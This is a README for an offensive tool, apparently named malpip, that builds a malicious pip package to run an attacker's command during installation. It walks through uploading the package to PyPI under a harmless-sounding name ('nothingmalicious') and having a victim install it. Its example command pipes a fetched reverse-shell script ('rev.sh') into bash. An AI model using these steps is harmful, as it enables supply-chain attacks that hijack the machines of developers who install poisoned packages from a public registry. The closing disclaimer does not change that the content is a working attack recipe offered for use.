malpip
Tool that creates a malicious pip package that runs your command during installation.
Prerequisite
Create an account on https://pypi.org
Installation
- Clone repository and set permissions.
git clone https://github.com/thegoodhackertv/malpip.git
cd malpip
sudo chmod +x malpip.sh
- Install dependencies.
sudo ./malpip install
- Set the command to be executed.
echo "curl -s http://localhost/rev.sh | bash" > command.txt
- Create malicious project. You will be asked for your pypi credentials to upload the project.
./malpip create nothingmalicious command.txt
- Install the package on the victim machine and your command will be executed.
pip install nothingmalicious
Useful Resources
- Youtube video (spanish)
- Website post (spanish)
Disclaimer
Usage of these scripts for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.